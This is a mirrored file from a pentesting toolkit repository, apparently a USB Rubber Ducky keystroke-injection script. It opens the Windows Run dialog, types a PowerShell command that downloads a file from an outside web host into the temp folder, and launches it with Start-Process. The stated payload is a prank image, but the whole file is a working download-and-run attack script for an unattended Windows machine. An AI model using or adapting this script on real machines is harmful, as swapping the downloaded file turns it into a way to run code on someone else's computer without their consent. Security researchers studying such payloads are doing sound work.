mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-28 11:36:08 -04:00
8 lines
245 B
Plaintext
8 lines
245 B
Plaintext
REM dowload and open an picture
|
|
DELAY 3000
|
|
GUI r
|
|
DELAY 100
|
|
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://mariwahl.us/figs/sn.png','%TEMP%\CRAZY_IMAGE.png');
|
|
DELAY 100
|
|
STRING Start-Process "%TEMP%\CRAZY_IMAGE.png"
|
|
ENTER |